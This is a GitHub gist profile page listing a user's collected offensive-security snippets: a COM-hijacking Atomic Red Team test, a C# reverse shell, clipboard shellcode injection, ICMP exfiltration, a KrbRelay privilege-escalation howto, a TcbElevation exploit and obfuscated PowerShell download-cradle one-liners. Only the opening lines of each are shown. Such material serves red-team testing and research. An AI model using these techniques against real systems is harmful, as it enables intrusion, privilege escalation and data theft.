Skip to content

Instantly share code, notes, and snippets.

View Unleashedmen's full-sized avatar
🎯
Focusing

Unleashed Unleashedmen

🎯
Focusing
1 follower · 2 following
View GitHub Profile
@Unleashedmen
Unleashedmen / AtomicRedTeam.sct
Created October 25, 2020 18:32 — forked from totoroha/AtomicRedTeam.sct
Sample COM Hijacking Atomic Red Team Test
<?XML version="1.0"?>
<scriptlet>
<registration
description="AtomicRedTeam"
progid="AtomicRedTeam"
version="1.00"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
remotable="true"
>
@Unleashedmen
Unleashedmen / Rulz.py
Created January 24, 2021 03:32 — forked from monoxgas/Rulz.py
#!/usr/bin/env python
# Rulz.py
# Author: Nick Landers (@monoxgas) - Silent Break Security
import os
import sys
import argparse
import re
import binascii
import codecs
@Unleashedmen
Unleashedmen / Simple_Rev_Shell.cs
Created June 11, 2021 21:14
C# Simple Reverse Shell Code
using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.ComponentModel;
using System.Linq;
using System.Net;
using System.Net.Sockets;
@Unleashedmen
Unleashedmen / ClippyShellcodeInject.cs
Created November 21, 2021 15:39
Clipboard Shellcode Injection
// Using the clipboard as your code cave.
// Generate your shellcode with msfvenom or whatever
// Compile: C:\windows\Microsoft.NET\Framework64\v3.5\csc.exe C:\Path\To\ClippyShellcodeInject.cs
using System;
using System.IO;
using System.Runtime.InteropServices;
namespace ClippySCInject
{
@Unleashedmen
Unleashedmen / icmp_exfiltration.py
Created February 15, 2022 23:43 — forked from maxrodrigo/icmp_exfiltration.py
ICMP Exfiltration
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from scapy.all import sniff, ICMP
def process_packet(packet):
if packet.haslayer(ICMP) and packet[ICMP].type == 0:
data = packet[ICMP].load[-8:]
try:
@Unleashedmen
Unleashedmen / ModiPass.sh
Created February 18, 2022 00:29 — forked from cryptolok/ModiPass.sh
#!/usr/bin/env bash
# sudo apt install hashcat
echo -e "\033[32m"
echo '
_ _ ___
/\/\ ___ __| (_) / _ \__ _ ___ ___
/ \ / _ \ / _` | |/ /_)/ _` / __/ __|
/ /\/\ \ (_) | (_| | / ___/ (_| \__ \__ \
@Unleashedmen
Unleashedmen / krbrelay_privesc_howto.md
Created May 2, 2022 01:28 — forked from tothi/krbrelay_privesc_howto.md
Privilege Escalation using KrbRelay and RBCD

KrbRelay with RBCD Privilege Escalation HOWTO

Short HOWTO about one use case of the work from Cube0x0 (KrbRelay) and others.

TL;DR

No-Fix Local Privilege Escalation from low-priviliged domain user to local system on domain-joined computers.

Prerequisites:

  • LDAP signing not required on Domain Controller (default!)
@Unleashedmen
Unleashedmen / TcbElevation.cpp
Created September 11, 2022 14:52 — forked from antonioCoco/TcbElevation.cpp
// TcbElevation - Authors: @splinter_code and @decoder_it
#define SECURITY_WIN32
#include <windows.h>
#include <sspi.h>
#include <stdio.h>
#pragma comment(lib, "Secur32.lib")
void EnableTcbPrivilege(BOOL enforceCheck);
@Unleashedmen
Unleashedmen / Download-Cradles-Oneliners.md
Created November 16, 2022 04:26 — forked from mgeeky/Download-Cradles-Oneliners.md
Various Powershell Download Cradles purposed as one-liners

Download Cradles

0) Extra goodies

  • Obfuscated FromBase64String with -bxor nice for dynamic strings deobfuscation:
$t=([type]('{1}{0}'-f'vert','Con'));($t::(($t.GetMethods()|?{$_.Name-clike'F*g'}).Name).Invoke('Yk9CA05CA0hMV0I=')|%{$_-bxor35}|%{[char]$_})-join''
  • The same as above but for UTF-16 base64 encoded strings:
@Unleashedmen
Unleashedmen / gpt.py
Created February 19, 2023 19:42 — forked from ustayready/gpt.py
CloudGPT - Use ChatGPT to analyze AWS policies for vulnerabilities
import openai
import boto3
import json
import time
from typing import Dict, List
openai.api_key = '### SET YOUR OPENAPI API KEY HERE ###'
session = boto3.session.Session()
client = session.client('iam')